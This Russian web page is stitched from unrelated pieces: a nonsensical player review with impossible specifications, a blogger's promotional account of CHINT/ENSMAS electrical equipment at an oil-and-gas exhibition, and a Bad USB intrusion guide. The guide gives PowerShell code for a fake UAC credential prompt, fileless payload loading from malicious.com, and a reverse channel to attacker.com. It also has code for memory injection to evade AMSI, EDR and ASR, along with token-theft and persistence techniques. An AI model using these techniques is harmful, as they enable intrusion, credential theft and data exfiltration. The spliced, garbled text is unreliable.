Arduino это просто

Купил плеер Sony NMG-27014. Вот так плеер выглядит.

Понравился плеер но у него оценка 2,7. Достоинства : он создаёт меньше мусора.

Он легко помещается в карман.

Его можно взять как в ручную кладь самолёта , так и багаже.

Недостатки: он неотключаемый.

Минимальный уровень 75 децибел .

Сильно шумит, показывая зашкаливание шумомера . 152 децибел.

Он работает от bluetooth , он не подключается при wi-fi .

Звук помех.

Работает рывками.

Непереносимость к холоду. Уже при температуре 15°С перестанет работать.

Частота звука от 30 ГГц до 15000 ГГц .

Начало здесь: Как прошла выставка «Нефтегаз-2025» в Москве (часть 1)

Хочется поделиться и тем, как завязывается диалог на таких мероприятиях, естественно, из опыта личного. Присел значит я на одном стенде в поисках зарядки для телефона. А тут мне уже и вкусный коктейль принесли. "Прикольно", - подумал я. Разговорился с ребятами, типа, телефон заряжается, все равно никуда не убежать. Оказывается, я попал на стенд компания ООО «Чинт Электрик» (бренды CHINT и ENSMAS). Эта компания уже 15 лет представлена на российском рынке, а специализируются они на комплексных интеллектуальных решениях в области производства и распределения энергии. Тааак, услышал про энергию, еще больше прилип к ним, энергетика же моя любимая тема.

Компания CHINT активно развивает представительство в промышленных секторах, включая секторы интеллектуальной энергии, автоматизации производства, интеллектуальных жилых и промышленных помещений. Что позволяет сформировать полноценную промышленную цепочку (выработки, хранения, передачи, распределения, продажи и потребления энергии). На выставке «Нефтегаз-2025» в Москве они показали и свои распределенные системы управления ENSMAS.

Короче, как я понял, ценность их новинок не только в безопасности, интересном дизайне, но и компактности и умности. Да, компания китайская, но они реально стремятся подставить плечо нашим промышленникам в такое важное время. Штаб-квартира CHINT расположена во всемирно известной “электротехнической” столице Китая - городе Вэньчжоу, провинция Чжэцзян.

Бренд ENSMAS (Energy SMArt Solutions), что в переводе с английского языка означает «энергия умных решений», был создан компанией специально для России. Его вывели в свет в 2023 году.

На выставке они впервые представили преобразователь частоты NVF7. Это устройство поддерживает векторное управление в открытом и замкнутом контуре, оснащено встроенным ЭМС-фильтром класса С3, дросселем для снижения гармонических искажений по току и тормозным прерывателем до 110 кВт. Оборудование поддерживает различные промышленные протоколы передачи данных и может свободно интегрироваться в цифровые экосистемы предприятий.

А ещё мне рассказали про автоматический выключатель для защиты электродвигателей NS8 с высокой отключающей способностью (до 100 кА), который уверенно защищает от перегрузки, предназначен для нечастых пусков асинхронных электродвигателей в распределительных щитах управления. В их линейке есть модульные и воздушные автоматические выключатели, контакторы NC8 и реле перегрузки NR(E)8 и многое другое.

Контакторы NC8, например, могут быть использованы для управления насосными станциями и системами фильтрации. Контакторы серии NC8 оснащены электронной катушкой, позволяющей реализовывать управление от сети как постоянного, так и переменного тока. Тепловые (NR8) и электронные (NRE8) реле перегрузки дополняют контакторы NC8. Они предназначены для защиты электродвигателей от перегрузок и обрыва фазы. Электронное реле NRE8 отличается точностью настройки установки и индикацией срабатывания.

Продолжение здесь: Как прошла выставка «Нефтегаз-2025» в Москве (часть 4)

Ваш Промблогер №1 в России Игорь (ZAVODFOTO)! Подписывайтесь на мой канал, я Вам ещё много чего интересного покажу

Физический вектор атаки через эмуляцию USB HID остаётся жизнеспособным способом первичного проникновения в организации с недостаточной зрелостью процессов безопасности. Малый бизнес сохраняет уязвимость к подобным угрозам вследствие ограниченного контроля устройств, неполного охвата групповых политик и низкого уровня осведомлённости сотрудников.

Хотите разбирать реальные случаи взломов и разбираться в киберугрозах? В своём Telegram-канале https://t.me/scontrols я делюсь историями атак, методами защиты и разбором уязвимостей. Подписывайтесь, если тема безопасности вам интересна.

Подготовка устройства Bad USB включает использование плат на базе микроконтроллеров с поддержкой HID (например, Arduino Pro Micro на ATmega32U4 или Digispark на ATtiny85). Для повышения реалистичности возможна модификация идентификаторов производителя и устройства (VID/PID) через прошивку EEPROM или изменение загрузчика с помощью внешнего программатора. Популярная практика включает эмуляцию моделей известных брендов периферии, чтобы избежать подозрений на этапе подключения.

На уровне прошивки реализуется сценарий автоматического ввода команд. Стандартный набор команд Arduino использует методы Keyboard.press(), Keyboard.print() и Keyboard.releaseAll(), что позволяет симулировать комбинации клавиш, необходимые для вызова окна «Выполнить» и запуска PowerShell в пользовательском контексте. В системах Windows 11 при стандартных настройках UAC выполнение команд от имени администратора без прямого подтверждения невозможно. Поэтому сценарий нацелен на выполнение команд от имени текущего пользователя, без явного повышения привилегий.

Сценарии с попыткой автоматизации нажатий Ctrl+Shift+Enter и Alt+Y для обхода UAC работают крайне нестабильно, поскольку Windows требует подтверждения через ввод учётных данных при наличии активной политики Secure Desktop.

Для повышения вероятности успешного повышения привилегий возможно применение социальной инженерии в виде поддельного окна UAC. Скрипт создаёт имитацию системного диалога, визуально идентичного стандартному UAC, с предложением ввести административные учётные данные. Пример кода на PowerShell для создания поддельного окна:

Add-Type -AssemblyName PresentationFramework $credential = [System.Windows.MessageBox]::Show('Windows needs your permission to continue.', 'User Account Control', 'OKCancel', 'Warning') if ($credential -eq 'OK') { Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "payload"' -Verb RunAs }

Для повышения реалистичности используется создание полноэкранной формы с блокировкой действий пользователя до ввода данных, после чего происходит передача введённой информации на внешний сервер или локальное её использование для немедленного повышения привилегий.

Первоначальный скрипт PowerShell должен быть минималистичным, способным к быстрой инъекции полезной нагрузки без необходимости записи файлов на диск. Для обхода AMSI и EDR предпочтительно использовать прямую загрузку полезной нагрузки в память процесса через Memory Injection.

Загрузка полезной нагрузки из сети реализуется через COM-объект WinHttp:

$webclient = New-Object -ComObject "WinHttp.WinHttpRequest.5.1" $webclient.Open("GET", "https://malicious.com/payload.bin", $false) $webclient.Send() $bytes = $webclient.ResponseBody $assembly = [System.Reflection.Assembly]::Load($bytes) $entryPoint = $assembly.EntryPoint $entryPoint.Invoke($null, @(,$null))

Этот подход позволяет загрузить исполняемый код напрямую в память, минуя файловую систему, что снижает вероятность обнаружения средствами антивирусной защиты и системами мониторинга активности на диске.

Для обратного подключения к системе управления атаками предпочтительно использовать реверсивное соединение через HTTPS-туннелирование. Прямые соединения по нестандартным портам часто блокируются NGFW и системами анализа сетевого трафика. Туннелирование через HTTPS позволяет замаскировать соединение под стандартный веб-трафик.

Создание HTTPS-туннеля может быть реализовано через встроенный в PowerShell модуль System.Net.HttpWebRequest:

$uri = "https://attacker.com/reverse" $request = [System.Net.HttpWebRequest]::Create($uri) $request.Method = "POST" $request.ContentType = "application/octet-stream" $stream = $request.GetRequestStream() while ($true) { $input = Read-Host $bytes = [System.Text.Encoding]::UTF8.GetBytes($input) $stream.Write($bytes, 0, $bytes.Length) $stream.Flush() }

В более продвинутых вариантах атаки создаётся сессионное соединение через WebSocket поверх HTTPS, что значительно усложняет обнаружение на уровне сетевых сигнатур.

Эксфильтрация данных через такие туннели маскируется под обычную активность HTTPS-сессий, что позволяет обойти системы DLP и NGFW, настроенные на анализ приложений по портам. В ряде случаев дополнительно применяется шифрование содержимого сессии на уровне прикладного протокола, чтобы усложнить инспекцию трафика.

Подключение устройства Bad USB пользователем остаётся непредсказуемым этапом атаки. Реальные исследования демонстрируют, что вероятность подключения найденного устройства в корпоративной среде варьируется от 10% до 20%. Этот показатель возрастает при наличии провоцирующих факторов вроде маркировки накопителя корпоративной символикой или намёка на ценную информацию.

Современные системы защиты, включая Microsoft Defender for Endpoint, CrowdStrike Falcon и SentinelOne, активно мониторят поведенческие индикаторы атаки: необычные цепочки процессов, аномальные сетевые активности, взаимодействия PowerShell с COM-объектами. Даже в случае успешного обхода AMSI вероятность обнаружения на этапе эксплуатации остаётся высокой при наличии правильно настроенных политик и оперативной облачной аналитики.

Техники Post-Exploitation в рамках Bad USB-атак в 2025 году опираются на быстрый переход к боковому перемещению и сбору ключевых артефактов, минимизируя шум в сети. Используются подходы инъекции шеллов в доверенные процессы через API NtCreateThreadEx, эксплуатации служебных интерфейсов COM для выполнения команд от имени системных служб, временного создания задач через Task Scheduler с последующим их удалением для достижения постоянства, захвата токенов привилегированных процессов через DuplicateTokenEx и имплантации в текущую сессию.

Обход защиты на этапе Post-Exploitation требует дополнительного внимания к механизмам Attack Surface Reduction (ASR), встроенным в Microsoft Defender for Endpoint 2025 года. Правила ASR активно блокируют запуск исполняемых файлов через Office-документы, автозагрузку через скрипты и несанкционированные изменения системных настроек. Для их обхода применяется модификация методов доставки полезной нагрузки. Скрипты внедряются через легитимные процессы, например, через taskhostw.exe или wsmprovhost.exe, с последующей загрузкой модулей в память через API VirtualAlloc и NtProtectVirtualMemory.

Пример скрипта обхода ASR с Memory Injection:

$bytes = [System.Convert]::FromBase64String("<payload_base64>") $ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length) [System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $ptr, $bytes.Length) $func = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, (New-Object System.Func[IntPtr, Int32])) $func.Invoke($ptr)

На следующем этапе может быть инициирован сбор Kerberos-токенов для последующего горизонтального перемещения по сети. Сбор осуществляется через вызовы методов LsaEnumerateLogonSessions и LsaGetLogonSessionData, позволяя получить действующие токены пользователей без необходимости их перехвата на сетевом уровне.

Обнаружение кейлоггеров и вредоносных агентов в малом бизнесе зависит от уровня зрелости инфраструктуры безопасности. Продвинутые резидентные кейлоггеры, внедрённые через Memory Injection и маскирующиеся под системные службы, могут оставаться незамеченными в течение нескольких суток при отсутствии EDR с поведенческим анализом.

Подведение итогов успешности всей цепочки атаки требует учёта множества факторов. Без строгих политик безопасности вероятность успешного проникновения и сбора информации оценивается на умеренном уровне. При наличии современных средств защиты вероятность успешной эксфильтрации и скрытого присутствия существенно снижается.